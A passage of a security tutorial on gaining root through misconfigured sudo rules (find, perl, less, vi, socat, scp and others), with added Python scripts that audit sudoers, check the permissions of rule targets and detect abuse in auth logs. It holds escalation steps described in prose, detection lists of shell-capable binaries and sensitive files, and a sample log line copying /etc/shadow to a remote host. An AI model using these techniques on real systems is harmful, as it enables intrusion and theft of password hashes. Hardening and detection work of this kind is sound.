Linux Privilege Escalation with Misconfigured Sudo
Source https://www.hackingarticles.in
Last updated
Let’s start with the theoretical concept!
In Linux/Unix, the sudoers file inside /etc is the configuration file for sudo rights. We all know the power of the sudo command; the word sudo stands for "Super User Do", i.e. perform a task with root privilege. The sudoers file is where the users and groups with root privileges are listed, so that they can run some or all commands as root or as another user. Take a look at the following image.
When you run any command with sudo, it needs root privileges for execution, so Linux checks whether that particular username is present in the sudoers file. If the username is not listed in the sudoers file, you cannot run the command or program using sudo. As per the default sudo rights, the root user can execute from ALL terminals, acting as ALL users in ALL groups, and run ALL commands.
GTFOBins is the prime resource for finding the appropriate methods for these binaries.
GTFOBins: https://gtfobins.github.io/
Sudoers File Syntax
If you (the root user) wish to grant sudo rights to a particular user, type the visudo command, which opens the sudoers file for editing. Under “User privilege specification” you will observe the default root permission “root ALL=(ALL:ALL) ALL”. In fact there is also an optional Tag field, as explained in the following image.
Consider the given example where we want to assign sudo rights to user raaz to access the terminal and run the copy command with root privilege. Here the NOPASSWD tag means that no password will be requested from the user.
NOTE:
(ALL:ALL) can also be written as (ALL).
If you find (root) in place of (ALL:ALL), it denotes that the user can run the command as root.
If no user/group is mentioned, sudo defaults to the root user.
On the other hand, start your attacking machine, first compromise the target system and then move to the privilege escalation phase. Suppose you have successfully logged into the victim’s machine through SSH and want to know the sudo rights of the current user; then run sudo -l as shown below.
In the traditional method, the PASSWD option is enabled for user authentication while executing the above command, and it can be disabled by using the NOPASSWD tag. The highlighted text indicates that the current user is authorized to execute all commands. Therefore we obtained root access by executing the command.
Again compromise the target system, move to the privilege escalation stage as done above and run sudo -l to view the sudo user list.
Here you can perceive the highlighted text, which shows that the user raaz can run all commands as the root user. Therefore we can achieve root access by performing the steps further down.
Note: Both of the above methods will ask for the user’s password for authentication at the time of executing the sudo -l command, because by default the PASSWD option is enabled.
Again compromise the victim’s system, move to the privilege escalation phase and run sudo -l to view the sudo user list.
At this point, you can notice the highlighted text indicating that the user raaz can run any command through the find command. Therefore we got root access by executing the commands below.
At the privilege escalation phase, run sudo -l to view the sudo user list.
Now you can observe the highlighted text showing that the user raaz can run a Perl program or script as the root user. Therefore we got root access by executing a Perl one-liner.
After compromising the target system, move to the privilege escalation phase as done above and run sudo -l to view the sudo user list.
At this point, you can perceive the highlighted text indicating that the user raaz can run a Python program or script as the root user. Thus we acquired root access by executing a Python one-liner.
For the privilege escalation phase, run sudo -l to view the sudo user list.
Here you can observe the highlighted text indicating that the user raaz can run the less command as the root user. Hence we obtained root access by executing the following.
It will open the requested system file in less, BUT to spawn a root shell type !bash as shown below and hit enter.
You will get root access as shown in the image below.
After compromising the target system, move to the privilege escalation phase as done above and run sudo -l to view the sudo user list.
At this phase, you can notice the highlighted text representing that the user raaz can run an AWK program or script as the root user. Therefore we obtained root access by executing an AWK one-liner.
For privilege escalation, run sudo -l to view the sudo user list.
Here you can observe the highlighted text indicating that the user raaz can run the man command as the root user. Therefore we got root access by executing the following.
It will display the Linux manual page, BUT to spawn a root shell type !bash as presented below and hit enter; you get root access as done above using the less command.
You will get root access as shown in the image below.
After compromising the target system, move to the privilege escalation phase as done above and run sudo -l to view the sudo user list.
Here you can observe the highlighted text indicating that user raaz can run the vi command as the root user. Consequently, we got root access by executing the following.
Thus, it will open the vi editor for editing, BUT to spawn a root shell type !bash as shown below and hit enter; you get root access as done above using the less command.
You will get root access as shown in the image below.
NOTE: sudo permission for less, nano, man and vi is very dangerous, as they allow the user to edit system files and lead to privilege escalation.
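To turn the sudoers syntax described above and the note on dangerous binaries into a check an administrator can run, here is an added audit script (my example, not code from the original article). It parses "User privilege specification" lines the way the notes describe, with (ALL) treated as (ALL:ALL) and a missing runas field defaulting to root, and then flags rules that grant ALL, skip the password with NOPASSWD, or allow one of the shell-capable binaries this article lists. The SHELL_CAPABLE set and the SAMPLE_SUDOERS excerpt are constructed for the example; GTFOBins is the place to extend the set.

```python
import os
import re
from dataclasses import dataclass

# Binaries the article shows giving a root shell once sudo allows them (interpreters,
# pagers and editors with a shell escape, find, awk, and the env/ftp/socat programs).
# Constructed list for this example; GTFOBins is the reference for extending it.
SHELL_CAPABLE = {
    "find", "perl", "python", "python2", "python3", "awk", "less", "more", "man",
    "vi", "vim", "nano", "env", "ftp", "socat",
}

# Tags that may precede the command list in a rule (only the common ones here).
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")

# user  host_list = (runas_user:runas_group) [TAG:] command_list
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)


@dataclass
class SudoRule:
    user: str          # user name or %group
    hosts: str         # host list, normally ALL
    runas_user: str    # account the command runs as
    runas_group: str   # group the command runs as ("" when not given)
    tags: list         # e.g. ["NOPASSWD"]
    commands: list     # command list; may contain "ALL"


def parse_rule(line: str):
    """Parse one user-privilege line; return None for blank, comment and Defaults lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    runas = m.group("runas")
    if runas is None:
        runas_user, runas_group = "root", ""      # nothing given: sudo defaults to root
    elif ":" in runas:
        runas_user, runas_group = (p.strip() for p in runas.split(":", 1))
    else:
        runas_user = runas.strip()
        runas_group = "ALL" if runas_user == "ALL" else ""   # (ALL) is shorthand for (ALL:ALL)
    rest = m.group("rest")
    tags = []
    while (tm := TAG_RE.match(rest)):
        tags.append(tm.group(1))
        rest = rest[tm.end():]
    commands = [c.strip() for c in rest.split(",") if c.strip()]
    return SudoRule(m.group("user"), m.group("hosts"), runas_user, runas_group, tags, commands)


def assess_rule(rule: SudoRule) -> list:
    """Findings for one rule: why it could hand the user a root shell or skip authentication."""
    findings = []
    if rule.runas_user not in ("root", "ALL"):
        return findings                          # this rule cannot run anything as root
    if "NOPASSWD" in rule.tags:
        findings.append("NOPASSWD: no password is requested")
    for cmd in rule.commands:
        if cmd == "ALL":
            findings.append("ALL: any command as root")
            continue
        prog = os.path.basename(cmd.split()[0])
        if prog in SHELL_CAPABLE:
            findings.append(f"{prog}: can spawn a shell or run arbitrary code as root")
    return findings


def audit_sudoers(text: str) -> list:
    """Return (user, original line, findings) for every rule with at least one finding."""
    results = []
    for raw in text.splitlines():
        rule = parse_rule(raw)
        if rule is None:
            continue
        findings = assess_rule(rule)
        if findings:
            results.append((rule.user, raw.strip(), findings))
    return results


# Constructed sudoers excerpt in the style of the rules discussed in the article.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
raaz    ALL=(ALL:ALL) NOPASSWD: /bin/cp
raaz    ALL=(root) /usr/bin/find, /usr/bin/less
raaz    ALL=/usr/bin/python
bob     ALL=(bob) /usr/bin/vi
"""

if __name__ == "__main__":
    for user, line, findings in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user:6} {line}\n    " + "\n    ".join(findings))
```

Run it against a copy of /etc/sudoers (and the files under /etc/sudoers.d) rather than the live file; the rule for bob is silently accepted because it can only run vi as bob, while every raaz rule and the root rule produce at least one finding.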
There is a high chance of finding some kind of script for a system or program call; it can be a Bash, PHP, Python or C script. Suppose you (the system admin) want to give sudo permission to a script which provides a bash shell on execution.
For example, we have some scripts which provide a root terminal on execution. In the image below you can observe that we have written 3 programs for obtaining a bash shell using different programming languages and saved all three files, asroot.py, asroot.sh and asroot.c (compiled file: shell), inside bin/script.
NOTE: While solving OSCP challenges you will find that some script has been hidden by the author for a kernel exploit or for a root shell, with sudo permission set for a particular user to execute that script.
Now allow raaz to run all the above scripts as the root user by editing the sudoers file with the help of the following command.
For the privilege escalation phase, run sudo -l to view the sudo user list.
The highlighted text indicates that the user raaz can run asroot.sh as the root user. Therefore we got root access by running the asroot.sh script.
During privilege escalation, run sudo -l to view the sudo user list.
At this time the highlighted text shows that user raaz can run asroot.py as the root user. Therefore we acquired root access by executing the following script.
After compromising the target system, move to the privilege escalation phase and run sudo -l to view the sudo user list.
Here you can perceive the highlighted text indicating that the user raaz can run shell (the compiled asroot.c file) as the root user. So we obtained root access by executing the following shell.
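A sudo rule on a script is only as safe as the file it points to: if the user who may run asroot.sh as root can also write to it, or to the bin/script directory that holds it, the script's contents stop mattering. The check below is an added example (mine, not the article's code) that an administrator can run over the targets of the rules before granting them; it reports files not owned by root, files writable by group or others, world-writable parent directories without the sticky bit, and rule targets that do not exist yet. The demo() function builds a throwaway bin/script directory with a constructed, deliberately world-writable asroot.sh so the check can be exercised offline.

```python
import os
import stat
import tempfile


def assess_mode(uid: int, mode: int) -> list:
    """Findings for the owner and permission bits of a file that sudo lets a user run as root."""
    findings = []
    if uid != 0:
        findings.append("not-root-owned")      # the owner can rewrite what later runs as root
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def assess_dir_mode(mode: int) -> list:
    """A world-writable parent directory without the sticky bit lets anyone replace the file."""
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        return ["dir-world-writable"]
    return []


def assess_target(path: str) -> list:
    """Stat the file named in a sudoers rule and its parent directory; return findings."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing"]                      # the rule names a file that could be created later
    findings = assess_mode(st.st_uid, st.st_mode)
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    findings += assess_dir_mode(parent.st_mode)
    return findings


def audit_targets(paths) -> dict:
    """Map each rule target to its findings; an empty list means nothing notable."""
    return {p: assess_target(p) for p in paths}


def demo() -> dict:
    """Constructed scenario: a bin/script directory with a world-writable asroot.sh."""
    with tempfile.TemporaryDirectory() as tmp:
        script_dir = os.path.join(tmp, "bin", "script")
        os.makedirs(script_dir)
        path = os.path.join(script_dir, "asroot.sh")
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\nid\n")        # contents are irrelevant to the check
        os.chmod(path, 0o777)                    # the misconfiguration under test
        # asroot.py is listed in the rule but was never created
        return audit_targets([path, os.path.join(script_dir, "asroot.py")])


if __name__ == "__main__":
    for target, findings in demo().items():
        print(target, findings or "ok")
```

In real use, feed audit_targets() the command paths taken from the sudoers rules; anything other than an empty list for a root-runnable target deserves a fix before the rule goes live.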
As we have seen above, some binary programs with sudo rights are helpful in getting root access. Apart from that, there are some applications which can also provide root access if they carry sudo privilege, such as FTP or socat. In the command below we have assigned sudo rights to the following programs, which can be run as the root user.
At the privilege escalation phase, run sudo -l to view the sudo user list.
As we can observe, user raaz has sudo rights for env, FTP, SCP and socat; now let’s try to get root access through them one by one.
Now let’s try to get root access through FTP with the help of the following commands:
Now let’s try to get root access through socat with the help of the following commands. Execute the command below on the attacker’s terminal in order to start a listener for the reverse connection.
Then run the following command on the victim’s machine and you will get root access on your attacker machine.
As we know, sudo rights are available for SCP, but it is not possible to get a bash shell directly as shown above, because SCP is a means of securely moving files between a local host and a remote host. Therefore we can use it for transferring those system files which require root permission for read/write operations, such as the /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path-of-the-directory
Now let’s confirm the transfer by inspecting the remote directory; as you can observe, we have successfully received the passwd and shadow files on our remote PC.
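Every sudo invocation in this article, from the sudo -l enumeration to less on a system file and scp of /etc/shadow, is written by sudo to the auth log, which is where a defender sees it. The following is an added detection example (mine, not the article's code) that parses sudo's syslog entries and flags the patterns the article demonstrates: root-level use of a shell-capable binary, a sensitive file such as /etc/shadow appearing as an argument, a sudo -l listing, and a denied command. The SAMPLE_AUTH_LOG lines are constructed to match sudo's usual "user : TTY=... ; PWD=... ; USER=... ; COMMAND=..." format; the hostname, user and 192.0.2.10 address are placeholders.

```python
import os
import re

# Constructed sudo entries in the syslog format sudo writes to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Jun 12 10:01:22 ubuntu sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/apt update
Jun 12 10:02:05 ubuntu sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/less /etc/passwd
Jun 12 10:03:41 ubuntu sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/scp /etc/shadow raaz@192.0.2.10:/tmp/
Jun 12 10:04:09 ubuntu sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=list
Jun 12 10:05:00 ubuntu sudo:     raaz : command not allowed ; TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/id
Jun 12 10:05:01 ubuntu sshd[1234]: Accepted publickey for raaz from 192.0.2.10 port 51522 ssh2
"""

# Optional status text ("command not allowed", "3 incorrect password attempts", ...)
# sits between the user and the TTY field when sudo refuses the request.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) :(?: (?P<status>[^;]+?) ;)? TTY=(?P<tty>\S+) ; "
    r"PWD=(?P<pwd>.*?) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Binaries the article shows escaping to a root shell; constructed list, see GTFOBins.
SHELL_CAPABLE = {
    "find", "perl", "python", "python2", "python3", "awk", "less", "more", "man",
    "vi", "vim", "nano", "env", "ftp", "socat",
}
# Files whose appearance as an argument to a root command is worth an alert.
SENSITIVE = {"/etc/shadow", "/etc/gshadow", "/etc/passwd", "/etc/sudoers"}


def parse_sudo_line(line: str):
    """Return the fields of one sudo log entry, or None for any other log line."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def assess_event(ev: dict) -> list:
    """Findings for a parsed entry; an empty list means routine use."""
    findings = []
    if ev["status"]:
        findings.append("denied:" + ev["status"])
    cmd = ev["cmd"]
    if cmd == "list":                            # sudo logs `sudo -l` as COMMAND=list
        findings.append("sudo-list")
        return findings
    argv = cmd.split()
    prog = os.path.basename(argv[0])
    if ev["runas"] == "root" and prog in SHELL_CAPABLE:
        findings.append("shell-capable-binary:" + prog)
    for arg in argv[1:]:
        if arg in SENSITIVE:
            findings.append("sensitive-file:" + arg)
    return findings


def detect(text: str) -> list:
    """Parse every sudo entry in the log text and attach its findings."""
    events = []
    for line in text.splitlines():
        ev = parse_sudo_line(line)
        if ev is None:
            continue
        ev["findings"] = assess_event(ev)
        events.append(ev)
    return events


def alerts(text: str) -> list:
    """Only the entries that produced at least one finding."""
    return [ev for ev in detect(text) if ev["findings"]]


if __name__ == "__main__":
    for ev in alerts(SAMPLE_AUTH_LOG):
        print(f"{ev['user']} -> {ev['runas']}: {ev['cmd']}  {ev['findings']}")
```

On a real host the same function can be pointed at /var/log/auth.log (or the output of journalctl -t sudo); the apt line is the only one of the five sudo entries that produces no finding.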